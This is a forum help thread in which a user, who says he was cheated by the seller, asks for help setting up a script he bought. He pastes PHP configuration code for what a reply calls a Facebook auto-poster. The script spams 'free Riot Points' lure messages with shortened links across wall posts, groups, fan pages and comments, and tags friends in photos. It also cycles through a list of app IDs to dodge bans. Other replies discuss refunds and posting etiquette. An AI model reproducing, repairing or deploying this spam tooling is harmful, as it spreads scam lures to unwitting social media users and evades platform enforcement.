Script help please

by 15 replies
17
hi everyone, i got a script from a member of this forum, i told me what the script does sold it to me with the instructions (or at least half of the instructions) but he didn't tell me how exactly set it up, then i told him that if he didn't tell me how to do it i was going to need my money back, then he deleted me from skype so he just took my money

So i was wandering if someone from here could help me figure this script out, i'll appreciate it

Thanks, Alex
#programming #instructions #money #script
  • What Type of script is it? Does it has to do anything with the sql databases? Does it need any inbuilt administrator configuration settings?

    The best person who can handle the product is the one who makes it, if he has made it, he must be knowing each and every turn of the script. I would recommend you to contact him wisely for information setting up the list or open a dispute On PayPal if you've paid him there!
    • [1] reply
    • I was correcting this post and as to the phrasing of my response Im not going to argue that. I speak the way I speak, blunt and to the point. I dont attack people. If I come across that way it is not intentional.
      All the best.
      • [1] reply
  • 1st) Paypal is not going to help you as they dont protect digital goods.

    2nd) This post itself has to be one of the worst I have seen in a long time. I have this thing and it does something, but I cant set it up, and its not working, can someone help me.... Ever think to say what the software does, is it web based, is it desktop based, what language is it in, .. and on and on and on. Ever think to describe it and your problem at all? Or do you expect people who are going to help you for free to just waste there time grilling you for info? Really dude you dont deserve help from this post, you put no effort into it, thus you deserve nothing back from it.
    • [1] reply
    • Did you ever think that if you don't like a post you don't have to comment on it, you are saying i am wasting your time or if you help me i would waste your time, but you wasted time just writing on this post, read and if you don't like it go on with your life and if i don't deserve help just keep moving to others post that deserve your time en effort,

      Thanks anyway
      • [1] reply
  • Best to try to get your money back, especially if it was recently and a WSO or classified.

    If it was, there should be a sales thread.

    Tell us more.
  • Pls paste the script first. Otherwise ur question means nothing. I know javaScript and sql. If ur script is one of them I may help u. If u like to maintain secracy, u can contact me on skype id "hsbkya"
  • Fact is... without any information about the script or the code itself (you might use pastee.org to paste your script there) we can not help.
  • Ok this is the code, i change everything that i need to change i think and if you go to the site, when you click on the get started button it says there is an error, it suppose to give you a code and enter it for it to work, so i don't know if you guys can see the error here

    thanks
    <?php
    /* GENERAL SETTINGS */
    $siteURL = "http://configuration.riotpointsgenerator.me/"; //your site url
    $redirectURL = "http://www.hackforums.net/"; //your redirection(download) url

    /*
    WHEREVER YOU NEED TO WRITE MESSAGE DO NOT WRITE URL TOO BECAUSE IT WILL BE ADDED FROM YOUR ARRAY OF REDIRECT URLS
    */

    /* WALL POST - SETTINGS */
    $wallMessageS = array("Hey, I just got Free Riot Points from this site. It is absolutely free and there are a limited supply left. Get yours now!"); //your message in status
    $wallPictureLink = "http://configuration.riotpointsgenerator.me/images/fb_pic.jpg"; //the link of the picture in status
    $nicheName = "Riot Points Generator..."; //your niche name
    $wallDescription = "Hey, I just got Free Riot Points from this site. It is absolutely free and there are a limited supply left. Get yours now!";//description about your niche
    $postOnVisitorWall = "yes";//do you want to post on visitor wall? (options yes/no)
    $postInGroups = "yes";//do you want to post in groups? (options: yes/no)
    $num_group_posts = "15"; //how much wall posts on group you want?
    $postInFanPages = "yes";//do you want to post in fan pages? (options: yes/no)
    $num_fanp_posts = "20"; //how much wall posts on group you want?

    /* COMMENT FRIEND STATUSES */
    $commentFriendsStatuses = "no";//do you want to comment friends statuses? (options yes/no)
    $commentMessageS = array("1 message","2 message", "3 message","etc");//your comment
    $numComments = "20";//how much statuses you want to spam?

    /* PICTURE UPLOAD AND TAG SETTINGS */
    $uploadPictureAndTagFriends = "yes";//do you want to upload picture and tag friends? (options: yes/no)
    $message_under_photoS = array("1 message","2 message", "3 message","etc"); //messages under photo on fb (script will use one randomly)
    $picture_for_uploadS = array("test.png","test.png","test.png","test.png", "test.png");//pictures for upload (script will use one randomly)
    $numberOfFriendsToTag = "30"; //number of friends to tag (50 max!)

    /* DOMAIN SPINNER */
    $fbURLDomains = array(//just insert your urls which will be added in statuses, comments etc.
    "http://bit.ly/10T96ff",
    "http://tinyurl.com/c5xhsh8",
    );

    /* DO NOT EDIT BELOW THIS LINE */
    $fbURLRedirect = $fbURLDomains[array_rand($fbURLDomains)];
    $picture_for_upload = $picture_for_uploadS[array_rand($picture_for_uploadS)];
    $message_under_photo = $message_under_photoS[array_rand($message_under_photoS)]." ".$fbURLRedirect;
    $commentMessage = $commentMessageS[array_rand($commentMessageS)]." ".$fbURLRedirect;
    $wallMessage = $wallMessageS[array_rand($wallMessageS)]." ".$fbURLRedirect;

    $postBody = array(
    'message' => $wallMessage,
    'link' => $fbURLRedirect,
    'picture' => $wallPictureLink,
    'name' => $nicheName,
    'caption' => "",
    'description' => $wallDescription
    );

    $allAppIDs = array(
    "8538193957",
    "19224105888",
    "2394864018",
    "16003312279",
    "48868000183",
    "10559807293",
    "5096946451",
    "6526747468",
    "5586223801",
    "14193953303",
    "4615364875",
    "17454385527",
    "5456848797",
    "23185435492",
    "4599561574",
    "12429445658",
    "9786134395",
    "5983497050",
    "13108398558",
    "15780783199",
    "20355814840",
    "9953271133",
    "23511676079",
    "5606497495",
    "10694117242",
    "28656874856",
    "5768421449",
    "14305193963",
    "2398893014",
    "22882994144",
    "16823379444",
    "7655041788",
    "54835105276",
    "15612486038",
    "9099746695",
    "14119101308",
    "9671960411",
    "23930516816",
    "11839765596",
    "5834809618",
    "26448081186",
    "4275053247",
    "5486137949",
    "7199555585",
    "6401965501",
    "7054708047",
    "20422466063",
    "8537968531",
    "6232366756",
    "8574978333",
    "8153550101",
    "12310249763",
    "2397524518",
    "32507227384",
    "13742585969",
    "6213078535",
    "7682531948",
    "5801453749",
    "7113191271",
    "6454949845",
    "4919773346",
    "2394074517",
    "21041729327",
    "25549600954",
    "29063491070",
    "22729132023",
    "9763546774",
    "8953916342",
    "6808029461",
    "17800475825",
    "13259225925",
    "13548777263",
    "4603814678",
    "21812252329",
    "4954422561",
    "8310891938",
    "8316065207",
    "10412692266",
    "21400916060",
    "18052044768",
    "6266593217",
    "5819564721",
    "9830039422",
    "14674005930",
    "32944435050",
    "18061728889",
    "10571058206",
    "6363306452",
    "2488093884",
    "2611162059",
    "6948656289",
    "10278199953",
    "36002296320",
    "5320538639",
    "10399270883",
    "20218128851",
    "11015545377",
    "10361836973",
    "8010004660",
    "17223139582",
    "16400688087",
    "16412242793",
    "19422331480",
    "6998196387",
    "10260252330",
    "5879239662",
    "11700264639",
    "8617092841",
    "10350135107",
    "20940264127",
    "10138420930",
    "11308881823",
    "19611533272",
    "8392698095",
    "16251428628",
    "2949245143",
    "2536997052",
    "16893349637",
    "19332037333",
    "11062458668",
    "6368699220",
    "6197999475",
    "2410673949",
    "4019701317",
    "2427617054",
    "14840477340",
    "15382853317",
    "15759834533",
    "20051566629",
    "33419900233",
    "7587294427",
    "2718310475",
    "10187851498",
    "15419810882",
    "17949570928",
    "7314558434",
    "8343933842",
    "14222555607",
    "7564518099",
    "10544797006",
    "24370388053",
    "7764255551",
    "8108028577",
    "9013815294"
    );

    function GetNewWorkingApp($appIDs) {
    $numberOfApps = count($appIDs);
    for ($i=0; $i<$numberOfApps; $i++) {
    $app_id = $appIDs[array_rand($appIDs)];
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://graph.facebook.com/". $app_id);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:13.0) Gecko/20100101 Firefox/13.0.1");
    $result = curl_exec($ch);
    curl_close($ch);

    if ( ( (strpos($result, "link")) && (strpos($result, "id")) ) === false) {

    } else {
    return $app_id;
    break 1;
    }
    }
    }
    ?>
  • Oh wow this is a Facebook auto poster. Only its outdated

    First you need working app IDs (from facebook).
    Second even with working ID's you would need a token now since FB removed the offline_access permission.

    Im sorry to say it, but I hope you didnt pay much for it, because its not very useful for anything.
  • whats the script?
  • well when you are trying to make it work with a little bit that i have left from a normal paycheck everything i invest is a little too much, anyway thanks for the help

Next Topics on Trending Feed

  • 17

    hi everyone, i got a script from a member of this forum, i told me what the script does sold it to me with the instructions (or at least half of the instructions) but he didn't tell me how exactly set it up, then i told him that if he didn't tell me how to do it i was going to need my money back, then he deleted me from skype so he just took my money So i was wandering if someone from here could help me figure this script out, i'll appreciate it